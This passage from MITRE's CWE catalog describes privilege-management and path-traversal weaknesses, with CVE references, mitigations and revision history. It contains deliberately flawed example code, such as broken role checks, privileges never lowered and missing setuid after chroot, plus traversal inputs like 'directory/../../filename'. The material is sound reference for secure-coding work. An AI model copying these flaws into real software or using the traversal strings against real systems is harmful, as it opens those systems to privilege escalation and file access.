privileged actions). + https://www.cve.org/CVERecord?id=CVE-2005-2173 + + + CVE-2005-2027 + Certain debugging commands not restricted to just the administrator, allowing registry modification and infoleak (Unsafe privileged actions). + https://www.cve.org/CVERecord?id=CVE-2005-2027 + + + + + Unsafe Privilege + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Note: there are 2 separate sub-categories here: + + - privilege incorrectly allows entities to perform certain actions + - object is incorrectly accessible to entities with a given privilege + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Maintenance_Notes, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships + + + CWE Content Team + MITRE + 2009-12-28 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-09-19 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Unsafe Privilege + + + + Two distinct privileges, roles, capabilities, or rights can be combined in a way that allows an entity to perform unsafe actions that would not be allowed without that combination. + + + + + + Primary + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Operation + + + High + + + Access Control + Gain Privileges or Assume Identity + A user can be given or gain access rights of another user. This can give the user unauthorized access to sensitive information including the access information of another user. + + + + + Architecture and Design + Separation of Privilege + Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource. + + + Architecture and Design + Operation + Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. + + + Architecture and Design + Operation + Environment Hardening + Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. + + + + + This code allows someone with the role of "ADMIN" or "OPERATOR" to reset a user's password. The role of "OPERATOR" is intended to have less privileges than an "ADMIN", but still be able to help users with small issues such as forgotten passwords. + + public enum Roles {ADMIN,OPERATOR,USER,GUEST} + public void resetPassword(User requestingUser, User user, String password ){ + if(isAuthenticated(requestingUser)){ + switch(requestingUser.role){ + case GUEST:System.out.println("You are not authorized to perform this command");break; + case USER:System.out.println("You are not authorized to perform this command");break; + default:setPassword(user,password);break;} + } + + else{System.out.println("You must be logged in to perform this command");} + } + + This code does not check the role of the user whose password is being reset. It is possible for an Operator to gain Admin privileges by resetting the password of an Admin account and taking control of that account. + + + + + CVE-2005-1736 + Chaining of user rights. + https://www.cve.org/CVERecord?id=CVE-2005-1736 + + + CVE-2002-1772 + Gain certain rights via privilege chaining in alternate channel. + https://www.cve.org/CVERecord?id=CVE-2002-1772 + + + CVE-2005-1973 + Application is allowed to assign extra permissions to itself. + https://www.cve.org/CVERecord?id=CVE-2005-1973 + + + CVE-2003-0640 + "operator" user can overwrite usernames and passwords to gain admin privileges. + https://www.cve.org/CVERecord?id=CVE-2003-0640 + + + + + Privilege Chaining + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + There is some conceptual overlap with Unsafe Privilege. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-12-28 + updated Other_Notes, Potential_Mitigations, Research_Gaps + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2019-09-19 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2022-04-28 + updated Research_Gaps + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + + + The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor. + + + + + + Primary + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Operation + + + Medium + + + Access Control + Gain Privileges or Assume Identity + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Operation + Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. + + + Architecture and Design + Separation of Privilege + Follow the principle of least privilege when assigning access rights to entities in a software system. + + + Architecture and Design + Separation of Privilege + Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource. + + + + + This code temporarily raises the program's privileges to allow creation of a new user folder. + + def makeNewUserDir(username): + if invalidUsername(username): + + + #avoid CWE-22 and CWE-78 + print('Usernames cannot contain invalid characters')return False + + try:raisePrivileges()os.mkdir('/home/' + username)lowerPrivileges() + except OSError:print('Unable to create new user directory for user:' + username)return False + return True + + + + While the program only raises its privilege level to create the folder and immediately lowers it again, if the call to os.mkdir() throws an exception, the call to lowerPrivileges() will not occur. As a result, the program is indefinitely operating in a raised privilege state, possibly allowing further exploitation to occur. + + + The following example demonstrates the weakness. + + seteuid(0); + /* do some stuff */ + + seteuid(getuid()); + + + + The following example demonstrates the weakness. + + AccessController.doPrivileged(new PrivilegedAction() { + public Object run() { + // privileged code goes here, for example: + System.loadLibrary("awt");return null; + // nothing to return + + } + + + + + + This code intends to allow only Administrators to print debug information about a system. + + public enum Roles {ADMIN,USER,GUEST} + public void printDebugInfo(User requestingUser){ + if(isAuthenticated(requestingUser)){ + switch(requestingUser.role){ + case GUEST:System.out.println("You are not authorized to perform this command");break; + default:System.out.println(currentDebugState());break; + + } + }else{System.out.println("You must be logged in to perform this command");} + } + + While the intention was to only allow Administrators to print the debug information, the code as written only excludes those with the role of "GUEST". Someone with the role of "ADMIN" or "USER" will be allowed access, which goes against the original intent. An attacker may be able to use this debug information to craft an attack on the system. + + + This code allows someone with the role of "ADMIN" or "OPERATOR" to reset a user's password. The role of "OPERATOR" is intended to have less privileges than an "ADMIN", but still be able to help users with small issues such as forgotten passwords. + + public enum Roles {ADMIN,OPERATOR,USER,GUEST} + public void resetPassword(User requestingUser, User user, String password ){ + if(isAuthenticated(requestingUser)){ + switch(requestingUser.role){ + case GUEST:System.out.println("You are not authorized to perform this command");break; + case USER:System.out.println("You are not authorized to perform this command");break; + default:setPassword(user,password);break;} + } + + else{System.out.println("You must be logged in to perform this command");} + } + + This code does not check the role of the user whose password is being reset. It is possible for an Operator to gain Admin privileges by resetting the password of an Admin account and taking control of that account. + + + + + CVE-2001-1555 + Terminal privileges are not reset when a user logs out. + https://www.cve.org/CVERecord?id=CVE-2001-1555 + + + CVE-2001-1514 + Does not properly pass security context to child processes in certain cases, allows privilege escalation. + https://www.cve.org/CVERecord?id=CVE-2001-1514 + + + CVE-2001-0128 + Does not properly compute roles. + https://www.cve.org/CVERecord?id=CVE-2001-0128 + + + CVE-1999-1193 + untrusted user placed in unix "wheel" group + https://www.cve.org/CVERecord?id=CVE-1999-1193 + + + CVE-2005-2741 + Product allows users to grant themselves certain rights that can be used to escalate privileges. + https://www.cve.org/CVERecord?id=CVE-2005-2741 + + + CVE-2005-2496 + Product uses group ID of a user instead of the group, causing it to run with different privileges. This is resultant from some other unknown issue. + https://www.cve.org/CVERecord?id=CVE-2005-2496 + + + CVE-2004-0274 + Product mistakenly assigns a particular status to an entity, leading to increased privileges. + https://www.cve.org/CVERecord?id=CVE-2004-0274 + + + CVE-2007-4217 + FTP client program on a certain OS runs with setuid privileges and has a buffer overflow. Most clients do not need extra privileges, so an overflow is not a vulnerability for those clients. + https://www.cve.org/CVERecord?id=CVE-2007-4217 + + + CVE-2007-5159 + OS incorrectly installs a program with setuid privileges, allowing users to gain privileges. + https://www.cve.org/CVERecord?id=CVE-2007-5159 + + + CVE-2008-4638 + Composite: application running with high privileges (CWE-250) allows user to specify a restricted file to process, which generates a parsing error that leaks the contents of the file (CWE-209). + https://www.cve.org/CVERecord?id=CVE-2008-4638 + + + CVE-2007-3931 + Installation script installs some programs as setuid when they shouldn't be. + https://www.cve.org/CVERecord?id=CVE-2007-3931 + + + CVE-2002-1981 + Roles have access to dangerous procedures (Accessible entities). + https://www.cve.org/CVERecord?id=CVE-2002-1981 + + + CVE-2002-1671 + Untrusted object/method gets access to clipboard (Accessible entities). + https://www.cve.org/CVERecord?id=CVE-2002-1671 + + + CVE-2000-0315 + Traceroute program allows unprivileged users to modify source address of packet (Accessible entities). + https://www.cve.org/CVERecord?id=CVE-2000-0315 + + + CVE-2000-0506 + User with capability can prevent setuid program from dropping privileges (Unsafe privileged actions). + https://www.cve.org/CVERecord?id=CVE-2000-0506 + + + + + Privilege Management Error + + + Part 2-4 + Req SP.03.08 BR + + + Part 3-2 + Req CR 3.1 + + + Part 3-3 + Req SR 1.2 + + + Part 3-3 + Req SR 2.1 + + + Part 4-1 + Req SD-3 + + + Part 4-1 + Req SD-4 + + + Part 4-1 + Req SI-1 + + + Part 4-2 + Req CR 1.1 + + + Part 4-2 + Req CR 2.1 + + + + + + + + + + + + + + Discouraged + CWE-269 is commonly misused. It can be conflated with "privilege escalation," which is a technical impact that is listed in many low-information vulnerability reports [REF-1287]. It is not useful for trend analysis. + If an error or mistake allows privilege escalation, then use the CWE ID for that mistake. Avoid using CWE-269 when only phrases such as "privilege escalation" or "gain privileges" are available, as these indicate technical impact of the vulnerability - not the root cause weakness. If the root cause seems to be directly related to privileges, then examine the children of CWE-269 for additional hints, such as Execution with Unnecessary Privileges (CWE-250) or Incorrect Privilege Assignment (CWE-266). + + + + + + The relationships between privileges, permissions, and actors (e.g. users and groups) need further refinement within the Research view. One complication is that these concepts apply to two different pillars, related to control of resources (CWE-664) and protection mechanism failures (CWE-693). + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Team + 2008-09-08 + Moved this entry higher up in the Research view. + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Maintenance_Notes, Name, Relationships, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-05-27 + updated Name + + + CWE Content Team + MITRE + 2009-12-28 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Description, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships, Type + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2019-09-19 + updated Demonstrative_Examples, Maintenance_Notes, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships, Taxonomy_Mappings + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-06-29 + 4.12 + 2023-06-29 + Suggested mappings to ISA/IEC 62443. + + Privilege Management Error + Insecure Privilege Management + + + + The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize multiple internal "../" sequences that can resolve to a location that is outside of that directory. + + This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. + The 'directory/../../filename' manipulation is useful for bypassing some path traversal protection schemes. Sometimes a program only removes one "../" sequence, so multiple "../" can bypass that check. Alternately, this manipulation could be used to bypass a check for "../" at the beginning of the pathname, moving up more than one directory level. + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. + Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2002-0298 + Server allows remote attackers to cause a denial of service via certain HTTP GET requests containing a %2e%2e (encoded dot-dot), several "/../" sequences, or several "../" in a URI. + https://www.cve.org/CVERecord?id=CVE-2002-0298 + + + + + 'directory/../../filename + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Directory Doubled Dot Dot Slash - 'directory/../../filename' + + + + The product does not properly manage privileges while it is switching between different contexts that have different privileges or spheres of control. + + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Operation + + + + + Access Control + Gain Privileges or Assume Identity + A user can assume the identity of another user with separate privileges in another context. This will give the user unauthorized access that may allow them to acquire the access information of other users. + + + + + Architecture and Design + Operation + Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. + + + Architecture and Design + Operation + Environment Hardening + Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. + + + Architecture and Design + Separation of Privilege + Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource. + + + + + CVE-2002-1688 + Web browser cross domain problem when user hits "back" button. + https://www.cve.org/CVERecord?id=CVE-2002-1688 + + + CVE-2003-1026 + Web browser cross domain problem when user hits "back" button. + https://www.cve.org/CVERecord?id=CVE-2003-1026 + + + CVE-2002-1770 + Cross-domain issue - third party product passes code to web browser, which executes it in unsafe zone. + https://www.cve.org/CVERecord?id=CVE-2002-1770 + + + CVE-2005-2263 + Run callback in different security context after it has been changed from untrusted to trusted. * note that "context switch before actions are completed" is one type of problem that happens frequently, espec. in browsers. + https://www.cve.org/CVERecord?id=CVE-2005-2263 + + + + + Privilege Context Switching Error + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This concept needs more study. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-12-28 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-02-16 + updated References + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2014-02-18 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not drop privileges before passing control of a resource to an actor that does not have those privileges. + In some contexts, a system executing with elevated permissions will hand off a process/file/etc. to another process or user. If the privileges of an entity are not reduced, then elevated privileges are spread throughout a system and possibly to an attacker. + + + + + + Primary + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Operation + + + High + + + Access Control + Gain Privileges or Assume Identity + If privileges are not dropped, neither are access rights of the user. Often these rights can be prevented from being dropped. + + + Access Control + Non-Repudiation + Gain Privileges or Assume Identity + Hide Activities + If privileges are not dropped, in some cases the system may record actions as the user which is being impersonated rather than the impersonator. + + + + + Architecture and Design + Separation of Privilege + + Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. + Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. + + + + Architecture and Design + Operation + Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. + + + Architecture and Design + Separation of Privilege + Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource. + + + + + The following code calls chroot() to restrict the application to a subset of the filesystem below APP_HOME in order to prevent an attacker from using the program to gain unauthorized access to files located elsewhere. The code then opens a file specified by the user and processes the contents of the file. + + chroot(APP_HOME);chdir("/");FILE* data = fopen(argv[1], "r+");... + + Constraining the process inside the application's home directory before opening any files is a valuable security measure. However, the absence of a call to setuid() with some non-zero value means the application is continuing to operate with unnecessary root privileges. Any successful exploit carried out by an attacker against the application can now result in a privilege escalation attack because any malicious operations will be performed with the privileges of the superuser. If the application drops to the privilege level of a non-root user, the potential for damage is substantially reduced. + + + + + CVE-2000-1213 + Program does not drop privileges after acquiring the raw socket. + https://www.cve.org/CVERecord?id=CVE-2000-1213 + + + CVE-2001-0559 + Setuid program does not drop privileges after a parsing error occurs, then calls another program to handle the error. + https://www.cve.org/CVERecord?id=CVE-2001-0559 + + + CVE-2001-0787 + Does not drop privileges in related groups when lowering privileges. + https://www.cve.org/CVERecord?id=CVE-2001-0787 + + + CVE-2002-0080 + Does not drop privileges in related groups when lowering privileges. + https://www.cve.org/CVERecord?id=CVE-2002-0080 + + + CVE-2001-1029 + Does not drop privileges before determining access to certain files. + https://www.cve.org/CVERecord?id=CVE-2001-1029 + + + CVE-1999-0813 + Finger daemon does not drop privileges when executing programs on behalf of the user being fingered. + https://www.cve.org/CVERecord?id=CVE-1999-0813 + + + CVE-1999-1326 + FTP server does not drop privileges if a connection is aborted during file transfer. + https://www.cve.org/CVERecord?id=CVE-1999-1326 + + + CVE-2000-0172 + Program only uses seteuid to drop privileges. + https://www.cve.org/CVERecord?id=CVE-2000-0172 + + + CVE-2004-2504 + Windows program running as SYSTEM does not drop privileges before executing other programs (many others like this, especially involving the Help facility). + https://www.cve.org/CVERecord?id=CVE-2004-2504 + + + CVE-2004-0213 + Utility Manager launches winhlp32.exe while running with raised privileges, which allows local users to gain system privileges. + https://www.cve.org/CVERecord?id=CVE-2004-0213 + + + CVE-2004-0806 + Setuid program does not drop privileges before executing program specified in an environment variable. + https://www.cve.org/CVERecord?id=CVE-2004-0806 + + + CVE-2004-0828 + Setuid program does not drop privileges before processing file specified on command line. + https://www.cve.org/CVERecord?id=CVE-2004-0828 + + + CVE-2004-2070 + Service on Windows does not drop privileges before using "view file" option, allowing code execution. + https://www.cve.org/CVERecord?id=CVE-2004-2070 + + + + + Privilege Dropping / Lowering Errors + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + CWE-271, CWE-272, and CWE-250 are all closely related and possibly overlapping. CWE-271 is probably better suited as a category. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Maintenance_Notes + + + CWE Content Team + MITRE + 2009-12-28 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The elevated privilege level required to perform operations such as chroot() should be dropped immediately after the operation is performed. + + + + + + Primary + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Operation + + + + + Access Control + Confidentiality + Gain Privileges or Assume Identity + Read Application Data + Read Files or Directories + An attacker may be able to access resources with the elevated privilege that could not be accessed with the attacker's original privileges. This is particularly likely in conjunction with another flaw, such as a buffer overflow. + + + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Compare binary / bytecode to application permission manifest + + + + SOAR Partial + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Host-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Manual Source Code Review (not inspections) + + Cost effective for partial coverage: + + Focused Manual Spotcheck - Focused manual analysis of source + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + SOAR Partial + + + Automated Static Analysis + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Permission Manifest Analysis + + + + SOAR Partial + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Attack Modeling + + + + High + + + + + Architecture and Design + Operation + Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. + + + Architecture and Design + Separation of Privilege + Follow the principle of least privilege when assigning access rights to entities in a software system. + + + Architecture and Design + Separation of Privilege + + Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. + Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. + + + + + + The following example demonstrates the weakness. + + setuid(0); + // Do some important stuff + setuid(old_uid); + // Do some non privileged stuff. + + + + + + The following example demonstrates the weakness. + + AccessController.doPrivileged(new PrivilegedAction() { + public Object run() { + // privileged code goes here, for example: + System.loadLibrary("awt");return null; + // nothing to return + + } + + + + + + The following code calls chroot() to restrict the application to a subset of the filesystem below APP_HOME in order to prevent an attacker from using the program to gain unauthorized access to files located elsewhere. The code then opens a file specified by the user and processes the contents of the file. + + chroot(APP_HOME);chdir("/");FILE* data = fopen(argv[1], "r+");... + + Constraining the process inside the application's home directory before opening any files is a valuable security measure. However, the absence of a call to setuid() with some non-zero value means the application is continuing to operate with unnecessary root privileges. Any successful exploit carried out by an attacker against the application can now result in a privilege escalation attack because any malicious operations will be performed with the privileges of the superuser. If the application drops to the privilege level of a non-root user, the potential for damage is substantially reduced. + + + + + Least Privilege Violation + + + Failure to drop privileges when reasonable + + + POS02-C + Follow the principle of least privilege + + + SEC00-J + Do not allow privileged blocks to leak sensitive information across a trust boundary + + + SEC01-J + Do not allow tainted variables in privileged blocks + + + SFP36 + Privilege + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + CWE-271, CWE-272, and CWE-250 are all closely related and possibly overlapping. CWE-271 is probably better suited as a category. + + If system privileges are not dropped when it is reasonable to do so, this is not a vulnerability by itself. According to the principle of least privilege, access should be allowed only when it is absolutely necessary to the function of a given system, and only for the minimal necessary amount of time. Any further allowance of privilege widens the window of time during which a successful exploitation of the system will provide an attacker with that same privilege. If at all possible, limit the allowance of system privilege to small, simple sections of code that may be called atomically. + When a program calls a privileged function, such as chroot(), it must first acquire root privilege. As soon as the privileged operation 